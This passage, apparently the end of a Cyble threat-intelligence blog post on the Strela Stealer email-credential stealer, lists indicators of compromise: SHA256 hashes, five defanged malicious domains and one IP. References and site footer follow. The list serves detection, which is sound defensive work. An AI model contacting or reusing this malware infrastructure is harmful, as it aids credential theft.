c900928cbbSHA256JavaScript9fc8d64d8204045764d0990647d42cb386c98501199553d043c277133549193aSHA256JavaScripta09688c0ce051235e92bb938090eebedea57c706158e0b665edce17d8dbe7543SHA256JavaScripta0def4009d3d6444b05f8d4071a65fbba6b6b36176104fc1fbb04affd0282969SHA256JavaScripta21f6c960cb3a702a9cf1da645301688b98763a8d1a4269a6b010616477e742fSHA256JavaScripta76fc70044c88c9313da07e3afa039640373c639ac16ae85ddef201fa5995ce3SHA256JavaScripta77cd7dcea434bea2ce6dbc1af32668007c0fc5168a325c0c9df8f976d47ae0cSHA256JavaScriptb0f2cff2784b1779a9688a3cd43436d272683554b356d2a6f75903e40ce680edSHA256JavaScriptb2efbb7368a89a746f5f1aea8e3df16cb017b4f79e0a6c3c1aaf51a7437cdd1bSHA256JavaScriptb5f9dff76d3cdf16ad8c95e699a4dd347e2bf987d7b9a4601b4bb6b7505a560fSHA256JavaScriptc1503c63332d723bc67acdc8de2fbaffb92b11de8174030eaf863d7ed152f947SHA256JavaScriptc55f10a2633aa6c7f5e246cee23ed04e73896f88a042c070a6c66698dc8b1f3eSHA256JavaScriptca3a8107b0c1ecf1a9f258e5b155a652e81710a2fa910bfd5ed31305a10ed06fSHA256JavaScriptca6446b428305c1845b87a4562c4ef24d99e5929a2a65101689ca473b0bbec43SHA256JavaScriptd3b78c9fdf7df019c14a21c18f4ca27c4210f31191ba5f35de358373b4077d43SHA256JavaScriptd40dbeaf32abed1610e11408953ddddad985cea279b86c31a27b841519112bfbSHA256JavaScripte2fa1484fa6cccfdae5838e59f4516017c3cd15e4872db0e459c43c8c8076882SHA256JavaScriptea090dccb35324c998ac5c2e3e499ed4c3812372cd6936777a9b4d10f8329c65SHA256JavaScriptee5cee0d57239e192cde8a52398172b515148969e4f6fc4bcf89de24aedafd4bSHA256JavaScriptf2708c2b771610ecda87d43c409a943fc4df6cdb090737ea47017f5ea4fc6a85SHA256JavaScriptf68522b21d226a9d7ab91105e4412ea3ad836801e090e1e6dce766def233c607SHA256JavaScriptf85dbbb00236db3abcc3383f2708fa4f53f5a464a62c4338391f513f49ea8b76SHA256JavaScriptfc9617a69ee597606fbc68a5280819e48c9679b1d44d09f86cb4b62b68835209SHA256JavaScriptfd407ac4d456c2196b128587347d85856989faec188334a8fbc4469f4b4e6ef2SHA256JavaScriptfed183856e7f09bb9f73d8c9d57bd3573ec846da1a49dc1eeb295c845007f5a2SHA256JavaScriptffdf20ae5a3124a69711eb46b11b01bed6cffb66aef711732f96ddb4546cb635SHA256JavaScriptffe0ff011712afeb8ebc70e09bb455cc6fdd36c8d3b31004d25dc1cd8cc74b8fSHA256JavaScript04f2cd6ddf9faef579d303c5efd2fc65b9997e05c3f75ea9b0cfc474f5e9019aSHA256Strela Stealer13d96ed827887f6c31d907a5ee29441e2afd95be683e51e874cf5ad8207c1a98SHA256Strela Stealer1970d38e7fa45a46e792372a19d890541c87d1007ddedd53858b6df6728d72ffSHA256Strela Stealerdbd301f710d45acdd639cda5cd47a5453b9abb8a361ed250bfc47de70318fec6SHA256Strela Stealer13531bd403e5f8f607bf16144c38ffd94004eafa8e6a098628b915de07ba432bSHA256Strela Stealer080caffde331496a46e8cb35acd107ed113046b46310747a2dd15a62efab23b5SHA256Strela Stealerbd26724bdc8c5d9cb65d361231048725fbc31072d4c457c23531bc4333460011SHA256Strela Stealer77836c0b18bbfef70fd04ba674ea045bf109851efe76ae9bcc55c2dcd08cc3c5SHA256Strela Stealer03853c56bcfdf87d71ba4e17c4f6b55f989edb29fc1db2c82de3d50be99d7311SHA256Strela Stealercd39bec789b79d9ea6a642ab2ddc93121f5596de21e3b13c335ceaddb83f2083SHA256Strela Stealerb9ae263904d3a5fb8471a0f8ab95fcbb224f632e6185e3a110e8d5aed9785420SHA256Strela Stealervaultdocker[.]comDomainMaliciouscloudslimit[.]comDomainMaliciousdailywebstats[.]comDomainMaliciousendpointexperiment[.]comDomainMaliciousapitestlabs[.]comDomainMalicious94[.]159[.]113[.]48IPMalicious REFERENCES https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc https://unit42.paloaltonetworks.com/strelastealer-campaign/ RELATED INCREASE IN THE EXPLOITATION OF MICROSOFT SMARTSCREEN VULNERABILITY CVE-2024-21412 Cyble analyzes an active campaign exploiting a Microsoft SmartScreen vulnerability to deliver stealers via spam emails. July 5, 2024 In "Exploit" CAPCUT USERS UNDER FIRE CRIL has uncovered a phishing campaign that targets unsuspecting CapCut users, aiming to steal their sensitive information. May 19, 2023 In "Phishing" REDLINE STEALER BEING DISTRIBUTED VIA FAKE EXPRESS VPN SITES Cyble Research and Intelligence Labs analyzes how threat actors deliver Redline Stealer via Fake Express VPN sites. November 30, 2022 In "Phishing" GET THREAT ASSESSMENT REPORT Identify External Threats Targeting Your Business Get My Report Free Your browser does not support the video tag. * * CISO’S GUIDE TO THREAT INTELLIGENCE 2024: BEST PRACTICES Stay Ahead of Cyber Threats with Expert Insights and Strategies. Download Free E-Book Now Search for your darkweb exposure Use Cyble's Largest Dark Web Monitoring Engine to Assess Your Exposure. Make Sure You're Aware of the Risks by Searching Through Our 150,447,938,145 Records! We Have Over 50,000 Data Breaches, Several Hacking Forums, Conversations Indexed. Download Now Cybercrime Magazine · AI's Impact On Cybersecurity. Microsoft Recall & Beyond. Beenu Arora, Co-Founder & CEO, Cyble. Business Email Address* Type your email… Subscribe Now Share the Post: PrevPreviousRansomware Vulnerability Matrix: A Comprehensive Resource for Cybersecurity Analysts NextThe Cybersecurity and Infrastructure Security Agency (CISA) Reports Urgent Security Updates for Apple ProductsNext RELATED POSTS GOOGLE FIXES CRITICAL ZERO-DAY VULNERABILITIES IN LATEST ANDROID SECURITY UPDATE November 6, 2024 GODFATHER MALWARE EXPANDS ITS REACH, TARGETING 500 BANKING AND CRYPTO APPLICATIONS WORLDWIDE November 6, 2024 QUICK LINKS Main Menu * Home * About Us * Blog * Cyble Partner Network (CPN) * Press * Responsible Disclosure * Knowledge Hub * Sitemap PRODUCTS Main Menu * AmIBreached * Cyble Vision * Cyble Hawk * Cyble Odin * The Cyber Express SOLUTIONS Main Menu * Attack Surface Management * Brand Intelligence * Threat Intelligence Platform * Dark Web Monitoring * Takedown and Disruption * Vulnerability Management * Third-Party Risk Management (TPRM) * Physical Threat Intelligence * Executive Monitoring * Cloud Security Posture Management (CSPM) PRIVACY POLICY Main Menu * AmIBreached * Cyble Vision * Cyble Trust Portal SCHEDULE A PERSONALIZED DEMO TO UNCOVER THREATS THAT NO ONE TELLS YOU Book a Demo © 2024. Cyble Inc.(#1 Threat Intelligence Platform Company). All Rights Reserved Made with from Cupertino Twitter Linkedin Youtube Request a demo Upcoming Events Research Reports Talk To Sales START TYPING AND PRESS ENTER TO SEARCH Begin Search... Scroll to Top DISCOVER MORE FROM CYBLE Subscribe now to keep reading and get access to the full archive. Type your email… Subscribe Continue reading Loading Comments... Write a Comment... Email Name Website We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.Ok Stay ahead in Cybersecurity with Cyble Research. You can unsubscribe at any time. AllowCancel